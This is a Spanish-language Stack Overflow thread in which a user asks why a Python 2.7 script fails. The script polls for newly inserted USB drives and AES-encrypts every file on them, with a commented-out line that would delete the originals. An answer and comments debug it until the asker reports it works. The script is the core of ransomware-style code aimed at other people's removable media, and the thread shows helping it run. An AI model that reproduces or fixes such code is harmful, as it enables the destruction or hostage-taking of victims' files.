# Código truena al momento de encriptar los archivos porque no puede encontrar la ruta especificada

Tags: python, python-2.7

Lo que quiero hacer que al momento de encriptar los archivos de mi función `encrypt_file(str(encrypt_files))`,  al pasarle la ruta con los archivos truena y me dice que no es posible: no puede encontrar la ruta especificada.
https://es.stackoverflow.com/editing-help
¿A qué se debe esto y cómo pudiera solucionarlo?

```
from ctypes import windll
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from Crypto import Random
import string
import time
import os, sys




def get_drives():
    drives = []
    bitmask = windll.kernel32.GetLogicalDrives()
    for letter in string.uppercase:
        if bitmask & 1:
            drives.append(letter)
        bitmask >>= 1
    return drives


def encrypt_file(filename):
    chunksize = 64 * 1024
    outFile = os.path.join(os.path.dirname(filename), "(encrypted)"+os.path.basename(filename))
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = ''

    for i in range(16):
        IV += chr(random.randint(0, 0xFF))

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, "rb") as infile:
        with open(outFile, "wb") as outfile:
            outfile.write(filesize)
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break

                elif len(chunk) % 16 !=0:
                    chunk += ' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))


def list_files(path):
    files = []
    for name in os.listdir(path):
        if os.path.isfile(os.path.join(path, name)):
            files.append(name)
    return files 



if __name__ == '__main__':
    print 'Searching usb...'
    while True:
        before = set(get_drives())
        time.sleep(5)
        after = set(get_drives())
        drives = after - before
        delta = len(drives)
        if (delta):
            for drive in drives:
                if os.system("cd " + drive + ":") == 0:
                    newly_mounted = '%c:\\'%(drive)
                    encrypt_files = list_files(newly_mounted)
                    print "letter: "+newly_mounted
                    print "There were %d drives added: %s. Newly mounted drive letter is %s" % (delta, drives, newly_mounted)
                    for x in encrypt_files:
                        if os.path.basename(x).startswith("(encrypted)"):
                            print "%s is already encrypted" %str(x)
                            pass

                        else:
                            encrypt_file(str(encrypt_files))
                            print "Done encrypting %s" %str(x)
                            """os.remove(x) """
                else:
                    print "Sorry, I couldn't find any newly mounted drives."
```

output

```
Searching usb...
letter: F:\
There were 1 drives added: set(['F']). Newly mounted drive letter is F:\

Traceback (most recent call last):
  File "C:\Users\Aaron\Desktop\new\script.py", line 80, in <module>
    encrypt_file(str(encrypt_files))
  File "C:\Users\Aaron\Desktop\new\script.py", line 25, in encrypt_file
    filesize = str(os.path.getsize(filename)).zfill(16)
  File "C:\Python27\lib\genericpath.py", line 57, in getsize
    return os.stat(filename).st_size
WindowsError: [Error 3] El sistema no puede encontrar la ruta especificada: "['Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters (1).pdf', 'CEH-Exam-Blueprint-v2.0.pdf', 'index.png', '\\xedndice.png', 'Learning Python, 5th Edition.pdf', 'kali-linux-2016.2-amd64.iso', 'solucionarioclculounavariable-140213124828-phpapp01-140925200731-phpapp02 (1).pdf', 'C\\xe1lculo de Una Variable - James Stewart - 7a Ed.pdf', 'Untitleddocument.docx', 'VirtualBox-5.1.8-111374-Win.exe', 'from_sqli_to_shell_i386.iso', 'script.py', 'Visit Islas Tasmania.docx', 'solucionariodechapraycanale-quintaedicion-150726233458-lva1-app6891.pdf', 'solucionarioclculounavariable-140213124828-phpapp01-140925200731-phpapp02.pdf']"
```

error al sustituir encrypt_files por x

```
Traceback (most recent call last):
  File "C:\Users\Aaron\Desktop\new\1.py", line 80, in <module>
    encrypt_file(x)
  File "C:\Users\Aaron\Desktop\new\1.py", line 25, in encrypt_file
    filesize = str(os.path.getsize(filename)).zfill(16)
  File "C:\Python27\lib\genericpath.py", line 57, in getsize
    return os.stat(filename).st_size
WindowsError: [Error 2] El sistema no puede encontrar el archivo especificado: 'Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters (1).pdf'
```

Comment: ¿Y la ruta en `str(encrypt_files)` es válida? ¿Cuál es la ruta que estás obteniendo y cuál es la ruta que debería ser? ¿Cuál es el `cwd()`?

Answer (score 1):

Fíjate en el error:

```
Traceback (most recent call last):
  File "C:\Users\Aaron\Desktop\new\script.py", line 80, in <module>
    encrypt_file(str(encrypt_files))
  File "C:\Users\Aaron\Desktop\new\script.py", line 25, in encrypt_file
    filesize = str(os.path.getsize(filename)).zfill(16)
  File "C:\Python27\lib\genericpath.py", line 57, in getsize
    return os.stat(filename).st_size
WindowsError: [Error 3] El sistema no puede encontrar la ruta especificada: "['Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters (1).pdf', 'CEH-Exam-Blueprint-v2.0.pdf', 'index.png', '\\xedndice.png', 'Learning Python, 5th Edition.pdf', 'kali-linux-2016.2-amd64.iso', 'solucionarioclculounavariable-140213124828-phpapp01-140925200731-phpapp02 (1).pdf', 'C\\xe1lculo de Una Variable - James Stewart - 7a Ed.pdf', 'Untitleddocument.docx', 'VirtualBox-5.1.8-111374-Win.exe', 'from_sqli_to_shell_i386.iso', 'script.py', 'Visit Islas Tasmania.docx', 'solucionariodechapraycanale-quintaedicion-150726233458-lva1-app6891.pdf', 'solucionarioclculounavariable-140213124828-phpapp01-140925200731-phpapp02.pdf']"
```

Te está diciendo que no pudo hacer algo en una lista de elementos. En concreto, intenta hacer lo siguiente sobre una lista:

```
str(os.path.getsize(filename))
```

Si miramos cómo se llega hasta aquí vemos que tiene su origen en la función `main`, que, simplificándola mucho, queda en:

```
encrypt_files = list_files(newly_mounted)
for x in encrypt_files:
    if os.path.basename(x).startswith("(encrypted)"):
        print "%s is already encrypted" %str(x)
        pass

    else:
        encrypt_file(str(encrypt_files))     # ¡AQUÍ pasas toda la lista!
        print "Done encrypting %s" %str(x)
        """os.remove(x) """
```

Lo que ocurre es que estás llamando la lista cada vez, en lugar de proporcionarle un elemento en cada ciclo del bucle:

```
for x in encrypt_files:
            encrypt_file(str(encrypt_files))
#                            ^^^^^^^^^^^^^
```

Como solución debes sustituir la variable por la `x` que se refiere al elemento individual sobre la lista que estás circulando:

```
for x in encrypt_files:
            encrypt_file(str(x))
#                            ^
```

Comment: puedo en parte si era eso solo que al cambiar mi variable por x ahora me da que un error del mismo que no puede encontrar el archivo pero ahora en ves de toda la lista 1 asi me da el error

Comment: @JazminEstes parece que el problema ahora es el pasarle la ruta completa del fichero.

Comment: listo ya funciono

Comment: @JazminEstes qué bien, ¿era lo que dije yo de la ruta completa?